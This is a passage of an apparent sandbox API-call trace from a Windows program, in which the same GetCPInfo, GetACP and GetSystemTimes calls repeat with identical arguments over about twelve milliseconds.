CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.576] GetACP () returned 0x4e4 [0170.576] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.576] GetACP () returned 0x4e4 [0170.576] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.576] GetACP () returned 0x4e4 [0170.577] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.577] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.577] GetACP () returned 0x4e4 [0170.577] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.577] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.577] GetACP () returned 0x4e4 [0170.577] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.577] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.577] GetACP () returned 0x4e4 [0170.577] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.577] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.577] GetACP () returned 0x4e4 [0170.577] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.577] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.577] GetACP () returned 0x4e4 [0170.577] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.577] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.577] GetACP () returned 0x4e4 [0170.577] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.577] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.577] GetACP () returned 0x4e4 [0170.578] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.578] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.578] GetACP () returned 0x4e4 [0170.578] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.578] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.578] GetACP () returned 0x4e4 [0170.578] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.578] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.578] GetACP () returned 0x4e4 [0170.578] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.578] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.578] GetACP () returned 0x4e4 [0170.578] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.578] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.578] GetACP () returned 0x4e4 [0170.578] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.578] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.578] GetACP () returned 0x4e4 [0170.578] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.578] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.578] GetACP () returned 0x4e4 [0170.578] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.579] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.579] GetACP () returned 0x4e4 [0170.579] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.579] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.579] GetACP () returned 0x4e4 [0170.579] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.579] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.579] GetACP () returned 0x4e4 [0170.579] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.579] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.579] GetACP () returned 0x4e4 [0170.579] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.579] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.579] GetACP () returned 0x4e4 [0170.579] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.579] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.579] GetACP () returned 0x4e4 [0170.579] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.579] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.579] GetACP () returned 0x4e4 [0170.579] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.579] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.580] GetACP () returned 0x4e4 [0170.580] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.580] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.580] GetACP () returned 0x4e4 [0170.580] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.580] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.580] GetACP () returned 0x4e4 [0170.580] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.580] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.580] GetACP () returned 0x4e4 [0170.580] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.580] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.580] GetACP () returned 0x4e4 [0170.580] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.580] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.580] GetACP () returned 0x4e4 [0170.580] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.580] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.580] GetACP () returned 0x4e4 [0170.580] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.581] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.581] GetACP () returned 0x4e4 [0170.581] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.581] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.581] GetACP () returned 0x4e4 [0170.581] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.581] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.581] GetACP () returned 0x4e4 [0170.581] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.581] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.581] GetACP () returned 0x4e4 [0170.581] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.581] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.581] GetACP () returned 0x4e4 [0170.581] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.581] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.581] GetACP () returned 0x4e4 [0170.582] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.582] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.582] GetACP () returned 0x4e4 [0170.582] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.582] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.582] GetACP () returned 0x4e4 [0170.582] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.582] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.582] GetACP () returned 0x4e4 [0170.582] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.582] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.582] GetACP () returned 0x4e4 [0170.582] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.582] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.582] GetACP () returned 0x4e4 [0170.582] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.582] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.582] GetACP () returned 0x4e4 [0170.582] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.583] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.583] GetACP () returned 0x4e4 [0170.583] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.583] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.583] GetACP () returned 0x4e4 [0170.583] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.583] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.583] GetACP () returned 0x4e4 [0170.583] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.583] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.583] GetACP () returned 0x4e4 [0170.583] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.583] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.583] GetACP () returned 0x4e4 [0170.583] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.583] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.583] GetACP () returned 0x4e4 [0170.583] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.584] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.584] GetACP () returned 0x4e4 [0170.584] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.584] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.584] GetACP () returned 0x4e4 [0170.584] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.584] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.584] GetACP () returned 0x4e4 [0170.584] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.584] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.584] GetACP () returned 0x4e4 [0170.584] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.584] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.584] GetACP () returned 0x4e4 [0170.584] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.584] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.584] GetACP () returned 0x4e4 [0170.584] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.584] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.584] GetACP () returned 0x4e4 [0170.584] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.585] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.585] GetACP () returned 0x4e4 [0170.585] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.585] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.585] GetACP () returned 0x4e4 [0170.585] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.585] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.585] GetACP () returned 0x4e4 [0170.585] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.585] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.585] GetACP () returned 0x4e4 [0170.585] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.585] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.585] GetACP () returned 0x4e4 [0170.585] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.585] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.585] GetACP () returned 0x4e4 [0170.585] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.585] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.585] GetACP () returned 0x4e4 [0170.586] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.586] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.586] GetACP () returned 0x4e4 [0170.586] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.586] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.586] GetACP () returned 0x4e4 [0170.586] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.586] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.586] GetACP () returned 0x4e4 [0170.586] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.586] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.586] GetACP () returned 0x4e4 [0170.586] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.586] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.586] GetACP () returned 0x4e4 [0170.586] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.586] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.586] GetACP () returned 0x4e4 [0170.586] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.587] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.587] GetACP () returned 0x4e4 [0170.587] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.587] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.587] GetACP () returned 0x4e4 [0170.587] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.587] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.587] GetACP () returned 0x4e4 [0170.587] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.587] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.587] GetACP () returned 0x4e4 [0170.587] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.587] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.587] GetACP () returned 0x4e4 [0170.587] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.587] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.587] GetACP () returned 0x4e4 [0170.588] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.588] GetACP () returned 0x4e4 [0170.588] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.588] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.588] GetACP () returned 0x4e4 [0170.588] GetSystemTimes (in: lpIdleTime=0x18fa70, 